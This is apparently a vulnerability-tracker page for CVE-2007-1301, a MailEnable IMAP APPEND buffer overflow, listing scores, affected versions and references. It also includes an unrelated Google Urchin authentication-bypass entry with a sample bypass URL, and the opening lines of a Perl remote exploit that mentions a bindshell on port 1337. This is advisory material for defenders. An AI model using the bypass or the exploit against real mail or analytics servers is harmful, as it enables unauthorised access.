CVE-2007-1301
Published 2007-03-07
Priority: P3 48
CVSS 2.0: 9 (critical), AV:N/AC:L/Au:S/C:C/I:C/A:C
EXPLOIT
EPSS: 12.17% (95.6th percentile)
Stack-based buffer overflow in the IMAP service in MailEnable Enterprise and Professional Editions 2.37 and earlier allows remote authenticated users to execute arbitrary code via a long argument to the APPEND command. NOTE: this is probably different than CVE-2006-6423.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mailenable | mailenable_professional | — | — |
No detection rules found.
Exploit-DB
Google Urchin 5.7.3 - 'Report.cgi' Authentication Bypass
exploitdb·2007-10-11
CVE-2007-5113 Google Urchin 5.7.3 - 'Report.cgi' Authentication Bypass
---
source: https://www.securityfocus.com/bid/26037/info
Google Urchin is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to gain administrative access to the vulnerable application. This may lead to other attacks.
Urchin 5.7.03 is vulnerable to this issue; other versions may also be affected.
NOTE: Further reports suggest that this is not a vulnerability, but a documented feature of the application.
http://www.example.com/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4&gtype=5
Exploit-DB
MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow
exploitdb·2007-03-02
CVE-2007-1301 MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow
---
#!/usr/bin/perl
#
# maildisable-v4.pl
#
# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
# Mail Enable Professional v2.33 (win32)
# Mail Enable Professional v2.35 (win32)
# Mail Enable Professional v2.37 (win32)
#
########
use Getopt::Std; getopts('t:n:u:p:', \%arg);
use Socket;
# Fixed metasploit win32 bindshell port 1337
No writeups or analysis indexed.
http://secunia.com/advisories/24361
http://www.mailenable.com/hotfix/
http://www.securityfocus.com/bid/22792
http://www.securitytracker.com/id?1017739
http://www.vupen.com/english/advisories/2007/0811
https://exchange.xforce.ibmcloud.com/vulnerabilities/32801
https://www.exploit-db.com/exploits/3397